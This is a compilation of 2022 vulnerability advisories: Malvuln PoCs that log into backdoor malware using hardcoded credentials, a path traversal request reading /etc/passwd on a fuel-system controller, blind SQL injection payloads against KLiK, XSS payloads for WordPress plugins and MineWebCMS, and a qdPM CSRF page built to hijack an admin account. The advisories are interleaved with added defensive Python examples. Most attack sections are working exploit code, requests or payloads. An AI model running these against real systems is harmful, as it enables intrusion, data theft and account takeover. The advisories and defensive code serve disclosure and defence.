<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Lana<br />Type: PE32<br />MD5: ea9ab5983a6fa71e31907e74d4ddbab6<br />Vuln ID: MVID-2022-0539<br />Dropped files: sersvc32.exe<br />Disclosure: 04/06/2022<br />Description: The malware listens on TCP port 9003. The credentials "admin" and "secret" are weak and stored in plaintext within the executable.<br /><br />00404004 aAdmin db 'admin',0 ; DATA XREF 00401FBF<br />00404004 ; sub_402765+4A3↑o<br />00404019 aSecret db 'secret',0 ; DATA XREF 00401FA8<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 9003<br />220 Silver FTP v1.1<br />USER admin<br />331 Password required for admin.<br />PASS secret<br />230 User logged in, proceed.<br />SYST<br />215 UNIX Type: L8<br />PASV<br />227 Entering Passive Mode (192,168,18,125,195,84).<br />STOR DOOM.exe<br />150 Data connection accepted.<br />226 Transfer ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=50004<br />DOOM="DOOM.exe"<br /><br />def doit():<br />    # Connect to the passive-mode data port announced in the 227 reply above<br />    # (192,168,18,125,195,84 -> 192.168.18.125, port 195*256+84 = 50004).<br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    # Stream the file over the data connection in chunks until EOF.<br />    f = open(DOOM, "rb")<br />    EXE = f.read(4096)<br />    while EXE:<br />        s.sendall(EXE)<br />        EXE=f.read(4096)<br /><br />    f.close()<br />    s.close()<br /><br />    print("By Malvuln")<br /><br />if __name__=="__main__":<br />    doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>==============[ Author ]==============<br />= Name: Momen Eldawakhly (Cyber Guy)<br />= Company: Cypro.se<br />======================================<br /><br />==============[ Product ]==============<br />= Vendor: Franklin Fueling Systems<br />= Product: FFS Colibri Controller Module<br />= Version: 1.8.19.8580<br />======================================<br /><br /><br />============[ HTTP Exploitation ]============<br /><br />GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1<br />Host: 192.168.1.6<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B<br />Upgrade-Insecure-Requests: 1<br /><br />============[ URL Exploitation ]============<br /><br />http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=<br /><br /><br /></code></pre>
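As an added defensive example (not Franklin Fueling Systems code and not part of the advisory above), the following Python shows the server-side check that the request above defeats: a user-supplied file_name is resolved lexically under a fixed base directory and rejected if it escapes it, and the same check is swept over access-log lines to flag past traversal attempts. UPLOAD_ROOT, the function names and the sample log lines are constructed assumptions.

```python
# Added example, not Franklin Fueling Systems code: server-side resolution of a
# user-supplied file_name against a fixed base directory, plus a log sweep that
# flags requests whose file_name escapes that directory. UPLOAD_ROOT, the
# function names and the sample log lines are assumptions constructed here.
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

UPLOAD_ROOT = "/srv/tsa/uploads"  # assumed base directory the CGI should be confined to


def safe_join(base, user_path):
    """Lexically resolve user_path under base and return the result, or None if it
    escapes base. A real handler should additionally pass the result through
    os.path.realpath so that symlinks inside base cannot point outside it."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def check_upload_request(request_target):
    """Parse a request target such as the one in the advisory and return
    (allowed, resolved_path). Percent-encoded sequences are decoded by parse_qs,
    so %2e%2e%2f is treated the same as ../ ."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    file_name = params.get("file_name", [""])[0]
    if not file_name:
        return (False, None)
    resolved = safe_join(UPLOAD_ROOT, file_name)
    return (resolved is not None, resolved)


# Constructed access-log lines in common log format; the second carries the
# request target shown in the advisory, the third the same idea percent-encoded.
SAMPLE_LOG = [
    '192.168.1.50 - - [06/Apr/2022:10:00:01 +0000] "GET /18198580/cgi-bin/tsaupload.cgi?file_name=report.txt&password= HTTP/1.1" 200 512',
    '192.168.1.50 - - [06/Apr/2022:10:00:02 +0000] "GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1" 200 1834',
    '192.168.1.50 - - [06/Apr/2022:10:00:03 +0000] "GET /18198580/cgi-bin/tsaupload.cgi?file_name=%2e%2e%2f%2e%2e%2fetc%2fpasswd&password= HTTP/1.1" 200 1834',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_traversal_requests(log_lines):
    """Return the request targets in log_lines that would have escaped UPLOAD_ROOT."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        if "tsaupload.cgi" not in target:
            continue
        allowed, _ = check_upload_request(target)
        if not allowed:
            flagged.append(target)
    return flagged


if __name__ == "__main__":
    for t in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", t)
```

The lexical check alone is enough to reject the advisory's payload; in a real handler the resolved path should also be canonicalised with realpath before the file is opened, since normpath does not follow symlinks.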
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/2906b5dc5132dd1319827415e837168f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.XLog.21<br />Vulnerability: Authentication Bypass Race Condition<br />Description: The malware listens on TCP port 5553. Third-party attackers who can reach the system before a password has been set can log on using the default credentials noname/nopass and run the commands made available by the backdoor, including changing the password, thereby potentially locking out the original intruder.<br /><br />With an incorrect username ("victim|pass") we get:<br />Received invalid name parameter!<br /><br />With an incorrect password ("noname|pass") we get:<br />Received incorrect password from client!<br /><br />Sending the correct noname|nopass credentials produces no error. Next, we must send valid commands using the correct pipe delimiter, or we get "Received invalid parameter" errors.<br /><br /> push offset aCmdChangepass ; "cmd changepass"<br />004018EA mov edx, [ebp+Str1]<br />004018ED push edx ; Str1<br />004018EE call _strcmp<br />004018F3 add esp, 8<br />004018F6 test eax, eax<br />004018F8 jnz loc_4019A6<br />004018FE lea eax, [ebp+Delimiter]<br />00401901 push eax ; Delimiter<br />00401902 push 0 ; String<br />00401904 call _strtok<br />00401909 add esp, 8<br />0040190C mov [ebp+Str1], eax<br />0040190F cmp [ebp+Str1], 0<br />00401913 jnz short loc_401930<br />00401915 push offset aReceivedInvali_4 ; "\r\nReceived invalid parameter (NULL) f"...<br />0040191A mov ecx, [ebp+s]<br />0040191D push ecx ; s<br />0040191E call sub_4019D9<br /><br />Family: XLog<br />Type: PE32<br />MD5: 2906b5dc5132dd1319827415e837168f<br />Vuln ID: MVID-2022-0543<br />Disclosure: 04/06/2022<br /><br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=5553<br /><br />def chk_res(s):<br />    # Read the backdoor's reply until a NUL or newline terminator arrives or the<br />    # peer closes; the socket timeout set in doit() stops this blocking forever.<br />    res=b""<br />    while True:<br />        try:<br />            chunk = s.recv(512)<br />        except timeout:<br />            break<br />        res += chunk<br />        if b"\0" in res or b"\n" in res or chunk == b"":<br />            break<br />    return res.decode(errors="replace")<br /><br />def doit():<br /><br />    s=socket(AF_INET, SOCK_STREAM)<br />    s.settimeout(5)<br />    s.connect((MALWARE_HOST, PORT))<br /><br />    #Change the backdoor's password so we PWN it!<br />    PAYLOAD="noname|nopass|cmd:changepass|malvuln"<br />    s.send(PAYLOAD.encode())<br />    time.sleep(0.5)<br /><br />    #See what the malware is about<br />    PAYLOAD="noname|malvuln|cmd:about"<br />    s.send(PAYLOAD.encode())<br />    time.sleep(0.5)<br />    print(chk_res(s))<br /><br />    #Terminate the backdoor<br />    PAYLOAD="noname|malvuln|cmd:kill"<br />    s.send(PAYLOAD.encode())<br />    time.sleep(0.5)<br />    print(chk_res(s))<br /><br />    s.close()<br /><br /><br />if __name__=="__main__":<br />    doit()<br />    print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/82641dabbb1f73dd775e200466a07ec1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Verify.h<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP ports 1906 and 1907. Third-party adversaries who can reach an infected host on either port can gain access and/or run any OS command.<br />Family: Verify<br />Type: PE32<br />MD5: 82641dabbb1f73dd775e200466a07ec1<br />Vuln ID: MVID-2022-0538<br />Disclosure: 04/06/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 1907<br />Welcome to pMK_Veryfun v2082 SHELL. Have fun ^.^ !<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />c:\>net user APPARITIONSEC 666 /add<br />net user APPARITIONSEC 666 /add<br />The command completed successfully.<br /><br />c:\>calc<br />calc<br /><br />C:\>nc64.exe x.x.x.x 1906<br />Welcome to pMK_Veryfun v2082, type "help" or "helpv" for more information.<br />Version [2082] - 4 Apr 2005 - Written by [pMK] - x0x0x0x0x0x0x0 [pTH]<br />Access granted! My IP is [192.168.18.125|DESKTOP-2C3IQHO]<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
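As an added detection example that is not part of Malvuln's advisories, the following Python performs a YARA-style string scan for the plaintext artefacts the three Malvuln advisories above document: Lana's hardcoded admin/secret pair and FTP banner, XLog's protocol error strings, and Verify's pMK_Veryfun banner. Because "admin" alone appears in countless clean binaries, the Lana rule additionally requires the password string to follow the username within a short window, mirroring the 0x15-byte spacing in the disassembly. The rule names, the window size and the sample buffers are constructed assumptions, not real malware content.

```python
# Added example, not Malvuln's code: a YARA-style string scan for the plaintext
# artefacts the three Malvuln advisories above document (Lana's hardcoded
# admin/secret pair and FTP banner, XLog's protocol error strings, Verify's
# pMK_Veryfun banner), with a proximity check for the credential pair. The rule
# names, the window size and the sample buffers are constructed assumptions.
import re

RULES = {
    "Backdoor.Win32.FTP.Lana.01.d": [b"admin\x00", b"secret\x00", b"220 Silver FTP v1.1"],
    "Backdoor.Win32.XLog.21": [b"Received invalid name parameter!",
                               b"Received incorrect password from client!"],
    "Backdoor.Win32.Verify.h": [b"Welcome to pMK_Veryfun"],
}


def find_all(buf, needle):
    """All byte offsets at which needle occurs in buf."""
    return [m.start() for m in re.finditer(re.escape(needle), buf)]


def credential_pair_offsets(buf, user=b"admin\x00", password=b"secret\x00", window=64):
    """(user_offset, password_offset) pairs where the password string follows the
    user string within `window` bytes, the layout the Lana disassembly shows
    (aAdmin at 0x404004, aSecret at 0x404019, 0x15 bytes apart)."""
    pairs = []
    for u in find_all(buf, user):
        for p in find_all(buf, password):
            if 0 < p - u <= window:
                pairs.append((u, p))
    return pairs


def scan(buf, rules=RULES, min_hits=1):
    """Return {family: {string: [offsets]}} for every family with at least
    min_hits of its strings present; the Lana rule additionally requires the
    credential pair to sit close together, so a stray "admin" alone does not fire."""
    report = {}
    for family, needles in rules.items():
        hits = {}
        for n in needles:
            offs = find_all(buf, n)
            if offs:
                hits[n.decode("latin-1").rstrip("\x00")] = offs
        if family.startswith("Backdoor.Win32.FTP.Lana") and not credential_pair_offsets(buf):
            continue
        if len(hits) >= min_hits:
            report[family] = hits
    return report


# Constructed sample: a fake header, the credential pair at the spacing from the
# advisory, and the FTP banner. None of this is real malware content.
SAMPLE_LANA = (b"MZ" + b"\x00" * 64 + b"admin\x00" + b"\x00" * 15
               + b"secret\x00" + b"\x00" * 32 + b"220 Silver FTP v1.1\r\n")
# Constructed clean buffer: "admin" present, but no password string near it.
SAMPLE_CLEAN = b"MZ" + b"\x00" * 32 + b"admin\x00" + b"\x00" * 200 + b"nothing to see"

if __name__ == "__main__":
    print(scan(SAMPLE_LANA))
    print(scan(SAMPLE_CLEAN))
```

The reported offsets are file offsets into the buffer; on a real sample they would be mapped through the PE section table to compare with the virtual addresses in the advisory.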
<pre><code># Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi<br /># Date: April 1st, 2022<br /># Exploit Author: corpse<br /># Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite<br /># Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite<br /># Version: 1.0<br /># Tested on: Debian 11<br /><br />Parameter: poll (GET)<br /> Type: time-based blind<br /> Title: MySQL time-based blind - Parameter replace (ELT)<br /> Payload: poll=ELT(1079=1079,SLEEP(5))<br /><br />Parameter: pollID (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)<br /><br />Parameter: voteOpt (POST)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15<br /><br /></code></pre>
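As an added example that is not KLiK's code, the following Python reproduces the pattern the sqlmap findings above imply (the pollID value spliced into the SQL text) beside a parameterised version, and runs both against an in-memory SQLite table using the advisory's own boolean-blind payloads. The table name, columns and rows are constructed assumptions, not the application's schema.

```python
# Added example, not KLiK code: the pattern the sqlmap findings above imply
# (the pollID value spliced into the SQL text) beside a parameterised version,
# run against an in-memory SQLite table. The table name, columns and rows are
# constructed assumptions, not the application's schema.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE poll_options (id INTEGER, pollID INTEGER, votes INTEGER)")
    db.executemany("INSERT INTO poll_options VALUES (?, ?, ?)",
                   [(26, 15, 0), (27, 15, 0), (30, 16, 0)])
    db.commit()
    return db


def count_options_vulnerable(db, poll_id):
    """String concatenation: the request parameter becomes part of the SQL, so the
    boolean-blind payload '15 AND 1248=1248' yields the same rows as '15', while
    '15 AND 1248=1249' yields none. That difference is the oracle sqlmap reported."""
    sql = "SELECT COUNT(*) FROM poll_options WHERE pollID = " + str(poll_id)
    return db.execute(sql).fetchone()[0]


def count_options_safe(db, poll_id):
    """Validate the type first, then bind the value; the driver never parses it as SQL."""
    if not str(poll_id).isdigit():
        raise ValueError("pollID must be a positive integer")
    row = db.execute("SELECT COUNT(*) FROM poll_options WHERE pollID = ?",
                     (int(poll_id),)).fetchone()
    return row[0]


def rejects(db, value):
    """True if the safe variant refuses the value."""
    try:
        count_options_safe(db, value)
    except ValueError:
        return True
    return False


def demo():
    """Run both variants against the advisory's pollID payloads and summarise."""
    db = make_db()
    return {
        "vuln_plain": count_options_vulnerable(db, "15"),
        "vuln_true": count_options_vulnerable(db, "15 AND 1248=1248"),
        "vuln_false": count_options_vulnerable(db, "15 AND 1248=1249"),
        "safe_plain": count_options_safe(db, "15"),
        "safe_rejects_payload": rejects(db, "15 AND 1248=1248"),
    }


if __name__ == "__main__":
    print(demo())
```

The time-based variants in the findings work the same way: once the input is bound as a parameter, SLEEP() can no longer be introduced into the statement, and the integer check in front of the query turns the attempt into a clean validation error rather than a 5-second delay.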
<pre><code>Title:<br />WordPress Plugin WP Downgrade < 1.2.3 - Admin+ Stored Cross-Site Scripting<br /><br />References:<br />CVE-2022-1001<br /><br />Author:<br />Taurus Omar<br /><br />Description:<br />The plugin only performs client-side validation of its "WordPress Target Version" setting, but does not sanitise and escape it server-side, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.<br /><br />Affects Plugins:<br />wp-downgrade - Fixed in version 1.2.3<br /><br />Proof of Concept:<br />Access the settings of the plugin (/wp-admin/options-general.php?page=wp_downgrade) and remove the maxlength as well as the pattern attribute on the "WordPress Target Version" settings field, then put the following payload in it and save: <script>alert(/XSS/)</script><br /><br />Classification:<br />Type XSS<br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba<br /><br />TracWordpress:<br />https://plugins.trac.wordpress.org/changeset/2696091<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting<br /><br />References:<br />CVE-2022-0864<br /><br />Author:<br />Taurus Omar<br /><br />Description:<br />The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.<br /><br />Affects Plugins:<br />Updraftplus - Fixed in version 1.22.9<br /><br />Proof of Concept:<br />https://example.com//wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(1)</script><br /><br />Classification:<br />Type XSS<br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872<br /></code></pre>
<pre><code># Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)<br /># Google Dork: NA<br /># Date: 03/27/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://qdpm.net/<br /># Software Link: https://sourceforge.net/projects/qdpm/files/latest/download<br /># Version: 9.2<br /># Tested on: KALI OS<br /># CVE : CVE-2022-26180<br />#<br />---------------<br /><br />Steps to Exploit:<br /> 1) Make an HTML file from the PoC below (change the user ID field accordingly) and host it.<br /> 2) Send it to the victim.<br /><br /><html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"><br /> <input type="hidden" name="sf_method" value="put" /><br /> <input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --><br /> <input type="hidden" name="users[photo_preview]" value="" /><br /> <input type="hidden" name="users[name]" value="AggressiveUser" /><br /> <input type="hidden" name="users[new_password]" value="TEST1122" /><br /> <input type="hidden" name="users[email]" value="administrator@Lulz.com" /><br /> <input type="hidden" name="users[photo]" value="" /><br /> <input type="hidden" name="users[culture]" value="en" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /></code></pre>
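As an added defensive example that is not qdPM's code, the following Python shows a synchroniser-token check of the kind that stops the auto-submitting form above: the token is an HMAC of the session id under a server secret, it must arrive in the POST body (the session cookie alone is attached by the browser automatically and proves nothing about where the form came from), and the sf_method override is honoured only after the token verifies. The secret, the session ids, the _csrf_token field name, the Origin check and the form dictionary are constructed assumptions.

```python
# Added example, not qdPM's code: a synchroniser-token check of the kind that
# would defeat the auto-submitting form above. The secret, session ids, the
# _csrf_token field name, the Origin check and the form dict are assumptions.
import hashlib
import hmac

SERVER_SECRET = b"constructed-server-secret"  # assumption: load from configuration in practice
EXPECTED_ORIGIN = "https://qdpm.net"


def issue_token(session_id):
    """Token to embed in the account form rendered for this session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_token(session_id, token):
    """Constant-time comparison against the token this session should hold."""
    return bool(token) and hmac.compare_digest(issue_token(session_id), token)


def handle_account_update(session_id, form, origin_header=None):
    """Process a POST to myAccount/update. Returns (status, message) and rejects
    the request before any users[...] field is looked at."""
    if origin_header is not None and origin_header != EXPECTED_ORIGIN:
        return (403, "origin mismatch")
    if not verify_token(session_id, form.get("_csrf_token", "")):
        return (403, "missing or invalid CSRF token")
    if form.get("sf_method", "post").lower() != "put":
        return (405, "unexpected method override")
    if form.get("users[new_password]"):
        return (200, "password changed for user id " + form.get("users[id]", "?"))
    return (200, "profile updated")


# The field set from the advisory's PoC form, as a cross-site page would post it:
# no token, because the attacker's page cannot read one from the victim's session.
FORGED_FORM = {
    "sf_method": "put",
    "users[id]": "1",
    "users[photo_preview]": "",
    "users[name]": "AggressiveUser",
    "users[new_password]": "TEST1122",
    "users[email]": "administrator@Lulz.com",
    "users[photo]": "",
    "users[culture]": "en",
}


def legitimate_form(session_id):
    """Same fields as submitted from the real account page, which embeds the token."""
    return dict(FORGED_FORM, _csrf_token=issue_token(session_id))


if __name__ == "__main__":
    print(handle_account_update("session-abc", FORGED_FORM))
    print(handle_account_update("session-abc", legitimate_form("session-abc")))
```

Marking the session cookie SameSite=Lax (or Strict) is a useful second layer, since the PoC relies on the cookie being sent with a cross-site POST, but the token check is what makes the handler safe regardless of browser behaviour.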
<pre><code># Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 02/20/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://mineweb.org/<br /># Software Link: https://github.com/mineweb/minewebcms<br /># Version: 1.15.2<br /># Tested on: KALI OS<br /># CVE : CVE-2022-1163<br />#<br />---------------<br /><br />Steps to Reproduce:<br />=> Install and set up the web app.<br />=> Log in to the web app using admin credentials.<br />=> Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar".<br />=> Add or edit a link and select "Drop-Down Menu".<br />=> Both the "Link Name" and "URL" inputs are vulnerable to simple XSS.<br />=> Payload: <script>alert(1);</script><br />=> The XSS triggers on "http://localhost/MineWebCMS-1.15.2/", i.e. the web app's home page.<br /><br />Note: As shown, this simple payload works in both inputs. The whole admin input structure of the web app allows HTML injection or XSS.<br /><br />References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/<br /><br /></code></pre>
<pre><code>Title:<br />WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting<br /><br />References:<br />CVE-2022-0994<br /><br />Author:<br />Taurus Omar<br /><br />Description:<br />The plugin does not sanitise and escape the Config Name, which could allow high-privilege users, such as admin, to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.<br /><br />Affects Plugins:<br />Hummingbird-performance - Fixed in version 3.3.2<br /><br />Proof of Concept:<br />Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)><br /><br />Save and click 'Apply' to trigger the XSS.<br /><br />Alternatively, go to Hummingbird's Settings > Configs and upload the following config:<br /><br />{<br /> "id": 1,<br /> "name": "<img src onerror=alert(/XSS/)>",<br /> "description": "Xss",<br /> "config": {<br /> "configs": {<br /> "settings": {<br /> "advanced": {<br /> "query_string": false,<br /> "emoji": false,<br /> "cart_fragments": false,<br /> "lazy_load": {<br /> "enabled": false<br /> }<br /> },<br /> "database": {<br /> "reports": {<br /> "enabled": false<br /> }<br /> },<br /> "gravatar": {<br /> "enabled": true<br /> },<br /> "page_cache": {<br /> "enabled": true,<br /> "detection": "auto",<br /> "integrations": {<br /> "varnish": false,<br /> "opcache": false<br /> },<br /> "preload": false<br /> },<br /> "performance": [],<br /> "rss": {<br /> "enabled": true,<br /> "duration": 3600<br /> },<br /> "settings": {<br /> "accessible_colors": false,<br /> "remove_settings": false,<br /> "remove_data": false,<br /> "control": true<br /> },<br /> "uptime": {<br /> "enabled": false<br /> }<br /> }<br /> },<br /> "strings": {<br /> "advanced": [<br /> "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"<br /> ],<br />
"database": [<br /> ""<br /> ],<br /> "gravatar": [<br /> "Gravatar cache - Active\n"<br /> ],<br /> "page_cache": [<br /> "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"<br /> ],<br /> "rss": [<br /> "RSS caching - Active\n"<br /> ],<br /> "settings": [<br /> "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"<br /> ],<br /> "uptime": [<br /><br /> "Uptime - Inactive\n"<br /> ]<br /> }<br /> },<br /><br /> "plugin": "1081721"<br />} <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a<br /><br /></code></pre>
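As an added defensive example that is not code from any of the plugins above, the following Python shows the server-side handling that the four XSS advisories on this page (WP Downgrade, UpdraftPlus, MineWebCMS and Hummingbird) were missing: the "WordPress Target Version" value is validated on the server with the same kind of pattern the client enforced, because maxlength and pattern attributes can simply be removed in the browser, and every stored or reflected value is HTML-escaped at the point it is rendered, which keeps each of the page's payloads as inert text. The version pattern, length limits, function names and markup are assumptions.

```python
# Added example, not code from any of the plugins above: server-side validation
# and output escaping for the four XSS advisories on this page. The version
# pattern, length limits, function names and markup are assumptions.
import html
import json
import re

# Assumed server-side mirror of the client-side pattern attribute: dotted numeric only.
VERSION_RE = re.compile(r"\d+(\.\d+){0,3}")


def validate_target_version(value):
    """Reject anything but a short dotted version before it is stored; client-side
    maxlength/pattern attributes can be removed in the browser, so this check
    is the one that counts (WP Downgrade case)."""
    value = value.strip()
    if len(value) > 12 or not VERSION_RE.fullmatch(value):
        raise ValueError("invalid WordPress target version")
    return value


def render_attr(value):
    """Escape for an HTML attribute value (quotes included)."""
    return html.escape(str(value), quote=True)


def render_interval_field(updraft_interval):
    """Reflected case (UpdraftPlus): the parameter is echoed into an attribute.
    With quotes escaped, the '"></script><script>' break-out stays text."""
    return '<input name="updraft_interval" value="%s">' % render_attr(updraft_interval)


def render_nav_link(name, url):
    """Stored case (MineWebCMS navbar): escape both fields and allow only
    http(s) or site-relative URLs in href."""
    if not re.match(r"^(https?://|/)", url):
        url = "#"
    return '<a href="%s">%s</a>' % (render_attr(url), html.escape(name))


def render_config_name(config_json):
    """Stored case (Hummingbird config import): the name from the uploaded JSON is
    length-limited and escaped when rendered, so the img/onerror payload is inert."""
    cfg = json.loads(config_json)
    name = str(cfg.get("name", ""))[:100]
    return "<h3>%s</h3>" % html.escape(name)


def is_rejected(value):
    """True if validate_target_version refuses the value."""
    try:
        validate_target_version(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_config_name('{"id": 1, "name": "<img src onerror=alert(/XSS/)>"}'))
    print(render_interval_field('"></script><script>confirm(1)</script>'))
```

Escaping is applied at output, not at input, so the stored values stay faithful to what the admin typed while every rendering context (attribute, element body, href) gets the treatment that context needs.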